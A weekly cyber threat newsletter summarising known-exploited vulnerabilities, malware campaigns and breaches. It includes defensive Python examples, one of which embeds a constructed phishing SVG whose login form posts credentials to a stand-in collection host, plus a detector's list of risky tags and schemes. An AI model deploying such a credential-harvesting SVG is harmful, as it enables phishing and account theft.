Cyber Threat Weekly – #52
The week of November 11th through November 17th, 332 cyber news articles were reviewed. Quite a bit of cyber threat trend and adversarial behavior news to share. Let’s start with increasing use of SVG attachments in email phishing.
An undocumented Fortinet FortiClient bug used to steal VPN credentials. Palo Alto updates its firewall management interface advisory. WezRat malware deployed by Iranian threat actors. Snail mail is used to deliver malware.
Threat actor deploying PXA Stealer via phishing campaign. PostgreSQL bug allows environment variable exploitation. North Korean IT workers are changing tactics. Two more critical bugs in Palo Alto’s Expedition migration tool.
New ‘Glove Stealer’ .NET malware. Legit infrastructure continues to be abused by threat actors, hijacked domains. Strela Stealer malware being served via phishing email. Researchers report on the State of Cloud Ransomware in 2024.
Attackers use novel macOS extended file attributes technique. Data aggregator leaks 122 million records. A deep dive into the TTPs of North Korean remote work scheme. The MOVEit vulnerability rears its head again.
LodaRAT, old malware with new tricks. Researchers analyze a multi-stage PowerShell infection chain. Another new-ish ransomware gang to keep an eye on, Ymir.
Broken Record Alert: Please patch N-day bugs!!!
Known exploited software flaws are one of the top 5 initial access vectors. We continue to share n-day vulnerabilities being actively exploited. You can prioritize starting with the CISA known exploited vulnerability (KEV) catalog.
A close #2 priority is flaws with weaponized proof of concept (PoC) code available. Exploit chances are higher with weaponized PoC code available. If you do nothing else with patching, have an emergency 24-to-48-hour patching process for exploited and weaponized PoC code available vulnerabilities.
You should consider what is exposed to the Internet. Architecture and zero trust network access (ZTNA) can go a long way to minimizing the number of devices exposed to the Internet.
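An added example (not the newsletter's own tooling) of the prioritization above in code: scanner findings are cross-referenced against a feed in the shape of the CISA KEV JSON, actively exploited flaws go first, weaponized PoC second, and the 24-versus-48-hour split on Internet exposure plus the 30/90-day standard windows are this example's own assumptions. Asset names, CVSS values and PoC flags are constructed; CVE-0000-0000 is a placeholder ID.

```python
import json

# Constructed sample in the shape of the CISA KEV JSON feed, trimmed to the
# fields used here; the CVE IDs are ones listed in this issue, the other
# values are made up for the example.
KEV_FEED = json.loads("""{"vulnerabilities": [
  {"cveID": "CVE-2024-0012",  "knownRansomwareCampaignUse": "Unknown"},
  {"cveID": "CVE-2024-9465",  "knownRansomwareCampaignUse": "Unknown"},
  {"cveID": "CVE-2024-43451", "knownRansomwareCampaignUse": "Unknown"}
]}""")

# Constructed scanner findings, one row per (asset, CVE); asset names, CVSS
# values and PoC flags are made up. "CVE-0000-0000" is a placeholder ID.
FINDINGS = [
    {"asset": "fw-edge-01", "cve": "CVE-2024-0012", "internet_exposed": True,
     "weaponized_poc": True, "cvss": 9.3},
    {"asset": "expedition-01", "cve": "CVE-2024-9465", "internet_exposed": False,
     "weaponized_poc": True, "cvss": 9.2},
    {"asset": "ws-0421", "cve": "CVE-2024-43451", "internet_exposed": False,
     "weaponized_poc": False, "cvss": 6.5},
    {"asset": "app-dmz-03", "cve": "CVE-0000-0000", "internet_exposed": True,
     "weaponized_poc": True, "cvss": 7.5},
    {"asset": "db-int-02", "cve": "CVE-0000-0000", "internet_exposed": False,
     "weaponized_poc": False, "cvss": 8.1},
]

def triage(finding, kev_ids):
    """Return (tier, sla_hours). Tier 1 = in KEV, tier 2 = weaponized PoC only,
    tier 3 = everything else. Tiers 1-2 get the 24-to-48-hour emergency window;
    24h for Internet-exposed and 48h otherwise is this example's rule, as are
    the 30/90-day standard windows for tier 3."""
    in_kev = finding["cve"] in kev_ids
    if in_kev or finding["weaponized_poc"]:
        return (1 if in_kev else 2), (24 if finding["internet_exposed"] else 48)
    return 3, (30 * 24 if finding["internet_exposed"] else 90 * 24)

def prioritized(findings, feed):
    """Cross-reference findings against the KEV feed and return them in patch order."""
    kev_ids = {v["cveID"] for v in feed["vulnerabilities"]}
    rows = []
    for f in findings:
        tier, sla = triage(f, kev_ids)
        rows.append(dict(f, tier=tier, sla_hours=sla))
    # Tier first, then the shortest SLA, then CVSS as a tiebreaker.
    return sorted(rows, key=lambda r: (r["tier"], r["sla_hours"], -r["cvss"]))
```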
CISA Known Exploited Vulnerabilities for November 4th to November 10th:
CVE-2021-26086 – Atlassian Jira Server and Data Center Path Traversal Vulnerability:
Allows a remote attacker to read particular files in the /WEB-INF/web.xml endpoint.
CVE-2014-2120 – Cisco Adaptive Security Appliance (ASA) Cross-Site Scripting (XSS) Vulnerability:
Allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter.
CVE-2021-41277 – Metabase GeoJSON API Local File Inclusion Vulnerability:
Metabase contains a local file inclusion vulnerability in the custom map support in the API to read GeoJSON formatted data.
CVE-2024-43451 – Microsoft Windows NTLMv2 Hash Disclosure Spoofing Vulnerability:
Could result in disclosing a user's NTLMv2 hash to an attacker via a file open operation. The attacker could then leverage this hash to impersonate that user.
CVE-2024-49039 – Microsoft Windows Task Scheduler Privilege Escalation Vulnerability:
Could allow an attacker-provided, local application to escalate privileges outside of its AppContainer, and access privileged RPC functions.
CVE-2024-9465 – Palo Alto Networks Expedition SQL Injection Vulnerability:
Allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system.
CVE-2024-9463 – Palo Alto Networks Expedition OS Command Injection Vulnerability:
Allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.
CVE-2024-9474 – Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability:
Allows for privilege escalation through the web-based management interface for several PAN products, including firewalls and VPN concentrators.
CVE-2024-0012 – Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability:
An authentication bypass vulnerability in the web-based management interface for several PAN-OS products, including firewalls and VPN concentrators.
CVE-2024-1212 – Progress Kemp LoadMaster OS Command Injection Vulnerability:
Allows an unauthenticated, remote attacker to access the system through the LoadMaster management interface, enabling arbitrary system command execution.
Phishing with Scalable Vector Graphics (SVG) Attachments
While not new, SVG attachments are becoming more popular. Threat actors can evade defenses and create login forms within the graphic for credential theft. Like most things that work, we should expect to see commoditization and greater use.
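An added example (not from the newsletter or any vendor) of what a mail-gateway check for this pattern can look for: an SVG is an XML document, so script blocks, event-handler attributes, HTML forms smuggled in through foreignObject and outbound links are all visible to a plain XML parser. The sample SVG and the example.invalid URLs are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Constructed sample (not a real attachment): an SVG that carries a script block,
# an onload handler, an HTML login form via foreignObject and an outbound link,
# which is the credential-theft pattern described above.
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
  xmlns:xhtml="http://www.w3.org/1999/xhtml" width="600" height="400" onload="init()">
  <script>function init(){}</script>
  <foreignObject width="600" height="400">
    <xhtml:form action="https://example.invalid/collect" method="post">
      <xhtml:input name="user"/><xhtml:input name="pass" type="password"/>
    </xhtml:form>
  </foreignObject>
  <a href="https://example.invalid/login"><text x="10" y="20">Open document</text></a>
</svg>"""

# Elements that turn a "picture" into something with script or HTML-form behaviour.
ACTIVE_TAGS = {"script", "foreignObject", "form", "input", "iframe", "embed", "object"}
RISKY_SCHEMES = ("http://", "https://", "javascript:", "data:")

def local(name):
    """Strip an XML namespace such as {http://www.w3.org/2000/svg} from a tag/attribute."""
    return name.rsplit("}", 1)[-1]

def inspect_svg(data):
    """Return a list of (reason, detail) findings; an inert SVG yields an empty list.
    A document that does not parse is itself reported, since a filter should not
    let an unparseable 'image' through unexamined."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [("unparseable SVG", str(exc))]
    findings = []
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.append((f"active element <{tag}>", el.get("action", el.get("name", ""))))
        for attr, value in el.attrib.items():
            a = local(attr)
            if a.lower().startswith("on"):                      # onload, onclick, ...
                findings.append((f"event handler {a}", value))
            elif a == "href" and value.strip().lower().startswith(RISKY_SCHEMES):
                findings.append(("external link", value))        # plain or xlink:href
    return findings

def should_quarantine(data):
    """Policy hook for a mail gateway: hold any SVG attachment with findings."""
    return bool(inspect_svg(data))
```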
Fortinet FortiClient Bug Abused to Steal VPN Credentials
A threat actor is using a post-exploitation framework called DEEPDATA to abuse a zero-day bug to steal VPN credentials. Researchers share details of a few malware families believed to be maintained by the threat actor.
https://thehackernews.com/2024/11/warning-deepdata-malware-exploiting.html
Palo Alto Firewalls Management Interface Zero-day Bug
The company has released a few IP addresses and is again urging customers to secure the management interfaces of their firewalls. The principle of least privilege should be applied to critical devices such as firewall management interfaces.
https://thehackernews.com/2024/11/pan-os-firewall-vulnerability-under.html
https://security.paloaltonetworks.com/PAN-SA-2024-0015
Iranian State Sponsored Actors Deploy WezRat
Researchers observed a new campaign targeting Israeli organizations. Keep an eye out for phishing lures similar to the one used in this campaign. Iran is no slouch when it comes to attack operations.
https://thehackernews.com/2024/11/iranian-hackers-deploy-wezrat-malware.html
https://research.checkpoint.com/2024/wezrat-malware-deep-dive/
Malicious QR Codes Delivered via Snail Mail
This is an interesting one, going old school-ish to deliver malicious QR codes that ultimately lead to Coper, a banking trojan. Pay attention to the lure; it can be used and twisted in several different ways.
https://www.malwarebytes.com/blog/news/2024/11/malicious-qr-codes-sent-in-the-mail-deliver-malware
PXA Stealer Deployed via Phishing Campaign
Currently targeting Europe and Asia, but that can change at any time. Researchers observed the attacker selling Facebook and Zalo account credentials as well as SIM cards. Stolen Facebook cookies are used to interact with Facebook Ads Manager and Graph API.
https://thehackernews.com/2024/11/vietnamese-hacker-group-deploys-new-pxa.html
https://blog.talosintelligence.com/new-pxa-stealer/
Researchers Discover PostgreSQL PL / Perl Bug
An unprivileged database user can modify sensitive environment variables leading to arbitrary code execution. Tracked as CVE-2024-10979 and rated an 8.8 CVSS score. Additional findings will be shared at a later date.
https://thehackernews.com/2024/11/high-severity-flaw-in-postgresql-allows.html
https://www.varonis.com/blog/cve-postgresql-pl/perl
https://www.postgresql.org/support/security/CVE-2024-10979/
Researchers Dig into North Korean IT Worker Activities
Initially gaining employment to sustain their nation’s illicit activities, they are getting more aggressive, participating in insider threats and malware attacks. Several researchers shared updated tactics, techniques, and procedures for the Contagious Interview campaign, which imitates video conference websites to lure targets into installing BeaverTail malware.
https://unit42.paloaltonetworks.com/fake-north-korean-it-worker-activity-cluster/
Two New Palo Alto Expedition Flaws Actively Exploited
The migration tool is under attack again, although not much data has been shared as of yet. These flaws are unauthenticated command injection (CVE-2024-9463) and SQL injection (CVE-2024-9465) vulnerabilities.
https://security.paloaltonetworks.com/PAN-SA-2024-0010
Researchers Discover New ‘Glove Stealer’ .NET Malware
This malware appears to be in its early stages of development. It is capable of stealing cookies, cryptocurrency wallets, 2FA tokens, and more from Firefox and Chromium-based browsers.
https://www.gendigital.com/blog/insights/research/glove-stealer
Hijacked Domains Fuel Threat Actors Attack Campaigns
There is no end to threat actors abusing legit infrastructure. Researchers share an attack technique called Sitting Ducks. It is very difficult for security tools to detect, just like abuse of residential routers, and it has been abused by several threat actors for various purposes.
https://thehackernews.com/2024/11/experts-uncover-70000-hijacked-domains.html
New Strela Stealer Phishing Campaign Abuses Stolen Emails
A change in tactics from generic fake invoices to stolen emails from real entities. While mainly targeting Europe currently, that can change quickly. The Strela Stealer malware itself has changed little over the past two years.
https://therecord.media/cybercriminals-taget-spain-germany-ukraine-strela-stealer-malware
https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/
Researchers share the State of Cloud Ransomware in 2024
Common attacks today include targeting cloud storage, using cloud services for data exfiltration, and web application ransom attacks. Cloud infrastructure is increasingly being targeted by threat actors, both cybercriminals and nation state backed.
https://www.sentinelone.com/blog/the-state-of-cloud-ransomware-in-2024/
RustyAttr Trojan Abuses macOS Extended Attributes for Deployment
A novel technique has been discovered to install a new trojan on macOS. Malicious code is hidden in custom file attributes to evade defenses. macOS extended attributes contain hidden metadata that is not directly visible with Finder or the terminal.
https://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/
Data Aggregator Leaks 122 million Records
DemandScience is the organization that didn’t turn off a system decommissioned two years ago. Formerly known as Pure Incubation, they admitted this is data from their system. The good news is it’s business data without passwords.
https://www.troyhunt.com/inside-the-demandscience-by-pure-incubation-data-breach/
North Korean Fraudulent Remote Work Scheme
Researchers dig into the behavior of North Koreans infiltrating organizations worldwide. Based on public information, a strategy is shared to detect the operatives. In addition to violating sanctions, these workers pose a threat to organizations through data exfiltration and extortion.
https://unit42.paloaltonetworks.com/north-korean-it-workers/
Dark Web Posts Bring Back MOVEit Leak Worries
A threat actor released employee data from 25 companies on a cybercriminal forum and is claiming 1,000 more releases.
https://therecord.media/delta-amazon-vendor-breach-confirmed
New LodaRAT Campaign Observed
While an older malware, it still works very well. A few updates have been observed, but overall remains largely the same. Researchers provide victimology and technical analysis.
https://www.rapid7.com/blog/post/2024/11/12/lodarat-established-malware-new-victim-patterns/
A multi-stage PowerShell Infection Chain Analyzed
Researchers dig into a sophisticated attack chain that starts with a LNK file.
https://cyble.com/blog/dissecting-a-multi-stage-powershell-campaign-using-chisel/
New-Ish Ymir Ransomware Strain Runs In-Memory
It appears Ymir ransomware is working with RustyStealer threat actors.
https://securelist.com/new-ymir-ransomware-found-in-colombia/114493/
31337 InfoSec - Cyber Threat Weekly - Derek Krein Newsletter